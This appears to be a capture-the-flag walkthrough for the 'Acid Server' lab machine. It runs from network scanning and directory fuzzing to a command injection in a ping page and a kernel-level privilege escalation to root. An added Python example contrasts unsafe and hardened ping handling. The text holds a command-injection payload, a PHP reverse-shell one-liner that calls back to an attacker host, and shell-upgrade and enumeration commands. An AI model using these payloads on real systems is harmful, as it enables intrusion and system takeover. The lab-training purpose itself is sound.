Acid Server
Tools:
- netdiscover
- Nmap
- Wfuzz
- DirBuster
- Burp
Vulnerabilities:
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation
Use netdiscover to find the target IP address:
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.170 is the target.
Then run nmap to find open ports and the services running on the target machine:
nmap -sV -v -O -A -T5 192.168.41.170 -p-
Port 33447 is open and running an HTTP service.
Run wfuzz against it:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.170:33447/FUZZ 2>/dev/null
This finds a path named Challenge.
Use DirBuster on http://192.168.41.170:33447/Challenge/
Check cake.php. Its source code contains /Magic_Box, which may be a hidden path.
Use DirBuster again on that path; command.php looks interesting.
Check that page: type 127.0.0.1 and intercept the request with Burp. It looks like it pings the IP address I typed.
Now try 127.0.0.1;id
It works, so there is a command injection vulnerability.
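As an added example (not part of the original write-up), here is the pattern command.php appears to implement, shown beside a hardened version and a helper for flagging suspicious inputs in request logs; the function names, the use of Python rather than PHP, and the ping -c 1 form of the command are assumptions.

```python
"""Constructed example: unsafe vs. hardened ping handler (assumed shape of
command.php; the 127.0.0.1;id input is the one used in the write-up)."""
import ipaddress
import subprocess
from typing import List


def build_ping_unsafe(user_input: str) -> str:
    # Vulnerable pattern: the request parameter is interpolated straight
    # into a shell command string, so ';', '|' or '&&' append extra commands.
    return f"ping -c 1 {user_input}"


def validate_ip(user_input: str) -> str:
    # Accept only a literal IPv4/IPv6 address. This rejects shell
    # metacharacters, hostnames and option smuggling such as "-c 9999".
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError as exc:
        raise ValueError(f"not an IP address: {user_input!r}") from exc


def build_ping_safe(user_input: str) -> List[str]:
    # Hardened: the validated value is one argv element and no shell is
    # involved, so the input can never be parsed as command syntax.
    return ["ping", "-c", "1", validate_ip(user_input)]


def run_ping(user_input: str, timeout: float = 5.0) -> str:
    # Execute via an argv list; subprocess never hands this to /bin/sh.
    result = subprocess.run(build_ping_safe(user_input), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


def looks_injected(user_input: str) -> bool:
    # Log-review helper: anything the strict validator rejects is a
    # candidate command injection attempt worth alerting on.
    try:
        validate_ip(user_input)
    except ValueError:
        return True
    return False
```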
In Burp, instead of the id command, use the following (URL-encoded):
php -r '$sock=fsockopen("192.168.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3");'
This returns a shell.
python -c 'import pty; pty.spawn("/bin/bash")'
After some enumeration:
cat /etc/*-release
The target is running Ubuntu 15.04.
searchsploit ubuntu | grep 15.04
Since the target doesn't have wget and gcc, I set up an FTP server, compiled the code locally and uploaded it.
Got root.